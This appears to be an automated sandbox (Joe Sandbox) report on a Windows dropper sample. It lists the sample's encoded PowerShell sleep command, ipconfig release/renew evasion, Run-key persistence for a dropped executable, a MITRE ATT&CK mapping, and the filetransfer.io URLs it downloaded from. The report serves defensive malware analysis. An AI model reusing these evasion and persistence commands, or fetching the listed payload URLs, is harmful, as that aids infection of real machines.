              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe TID: 160 Thread sleep count: 196 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5308 Thread sleep count: 7601 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4624 Thread sleep time: -14757395258967632s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5116 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2120 Thread sleep time: -12912720851596678s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7601
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9150
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: powershell.exe, 00000001.00000002.438150424.0000000005311000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V
              Source: powershell.exe, 00000001.00000002.438150424.0000000005311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Kl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe Process created: Base64 decoded start-sleep -seconds 45
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-Date
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig/release
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA==
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig/renew
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe PID: 5016, type: MEMORYSTR

              Remote Access Functionality

              barindex
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (numbers in parentheses are the count of matching signatures; "-" marks an empty cell)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | PowerShell (1) | Registry Run Keys / Startup Folder (1) | Process Injection (11) | Masquerading (1) | Input Capture (11) | Security Software Discovery (11) | Remote Services | Input Capture (11) | Exfiltration Over Other Network Medium | Encrypted Channel (11) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder (1) | Disable or Modify Tools (1) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Archive Collected Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion (21) | Security Account Manager | Virtualization/Sandbox Evasion (21) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (11) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (13) | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Remote System Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Hidden Users (1) | Cached Domain Credentials | System Network Configuration Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information (2) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing (12) | Proc Filesystem | System Information Discovery (12) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
Behavior Graph

Behavior Graph ID: 756122 | Sample: SecuriteInfo.com.Win32.Drop... | Startdate: 29/11/2022 | Architecture: WINDOWS | Score: 100

Start:
• DNS/IP: s23.filetransfer.io; filetransfer.io
• Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 8 other signatures
• Started: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe

SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe:
• DNS/IP: filetransfer.io 188.114.96.3, 443, 49695, 49696 CLOUDFLARENETUS European Union; s23.filetransfer.io 188.114.97.3, 443, 49697, 49700 CLOUDFLARENETUS European Union
• Dropped: C:\Users\user\AppData\...\Mqombsglp.exe, PE32; C:\Users\...\Mqombsglp.exe:Zone.Identifier, ASCII
• Signatures: Encrypted powershell cmdline option found
• Started: cmd.exe; cmd.exe; powershell.exe; powershell.exe

cmd.exe (first instance):
• Signatures: Uses ipconfig to lookup or modify the Windows network settings
• Started: conhost.exe; ipconfig.exe

cmd.exe (second instance):
• Started: conhost.exe; ipconfig.exe

powershell.exe (first instance):
• Started: conhost.exe

powershell.exe (second instance):
• Started: conhost.exe

Source | Detection | Scanner | Label
SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe | 100% | Avira | TR/Dropper.Gen
SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe | 100% | Joe Sandbox ML | -

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe | 38% | ReversingLabs | Win32.Trojan.Generic

Source | Detection | Scanner | Label
0.0.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.150000.0.unpack | 100% | Avira | HEUR/AGEN.1202479

No Antivirus matches
Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://crl.microsoft | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
http://www.microsoft.co | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://james.newtonking.com/projects/json | 0% | URL Reputation | safe
https://s23.filetransfer.io/storage/download/EmFT04AdCdjg | 0% | Avira URL Cloud | safe
https://s23.filetransfer.io/storage/download/1tQUp1sCtsBK | 0% | Avira URL Cloud | safe
http://filetransfer.io | 0% | Avira URL Cloud | safe
https://filetransfer.io/data-package/XK4aNvBX/download | 0% | Avira URL Cloud | safe
http://filetransfer.io/data-package/XK4aNvBX/download | 0% | Avira URL Cloud | safe
62.102.148.158 | 0% | Avira URL Cloud | safe
https://filetransfer.io4 | 0% | Avira URL Cloud | safe
https://s23.filetransfer.io4 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
filetransfer.io | 188.114.96.3 | true | false | - | unknown
s23.filetransfer.io | 188.114.97.3 | true | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://s23.filetransfer.io/storage/download/EmFT04AdCdjg | false | Avira URL Cloud: safe | unknown
62.102.148.158 | true | Avira URL Cloud: safe | unknown
https://s23.filetransfer.io/storage/download/1tQUp1sCtsBK | false | Avira URL Cloud: safe | unknown
http://filetransfer.io/data-package/XK4aNvBX/download | false | Avira URL Cloud: safe | unknown
https://filetransfer.io/data-package/XK4aNvBX/download | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://filetransfer.io4 | SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581666022.0000000002516000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.microsoft | powershell.exe, 00000001.00000003.358114104.00000000035E6000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://go.micro | powershell.exe, 00000001.00000002.445374191.000000000561F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.newtonsoft.com/jsonschema | SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.591838998.0000000007200000.00000004.08000000.00040000.00000000.sdmp | false | - | high
http://www.microsoft.co | powershell.exe, 00000001.00000003.421845130.00000000081D1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.nuget.org/packages/Newtonsoft.Json.Bson | SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.591838998.0000000007200000.00000004.08000000.00040000.00000000.sdmp | false | - | high
http://filetransfer.io | SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581434532.00000000024E7000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/syohex/java-simple-mine-sweeperC: | SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581434532.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.426684299.0000000004DB1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://james.newtonking.com/projects/json | SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.583673856.00000000026F6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://s23.filetransfer.io4 | SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581861359.0000000002545000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | s23.filetransfer.io | European Union | 13335 | CLOUDFLARENETUS | false
188.114.96.3 | filetransfer.io | European Union | 13335 | CLOUDFLARENETUS | false
                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                  Analysis ID:756122
                                  Start date and time:2022-11-29 16:53:32 +01:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 10m 32s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:16
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@17/8@6/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                  • TCP Packets have been reduced to 100
• Not all processes were analyzed; the report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
Time | Type | Description
16:55:01 | API Interceptor | 74x Sleep call for process: powershell.exe modified
16:56:34 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Mqombsglp "C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe"
16:56:43 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Mqombsglp "C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe"
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):5829
                                  Entropy (8bit):4.902247628650607
                                  Encrypted:false
                                  SSDEEP:96:3CJ2Woe5F2k6Lm5emmXIGegyg12jDs+un/iQLEYFjDaeWJ6KGcmXs9smEFRLcU6j:Wxoe5FVsm5emdzgkjDt4iWN3yBGHc9s8
                                  MD5:F948233D40FE29A0FFB67F9BB2F050B5
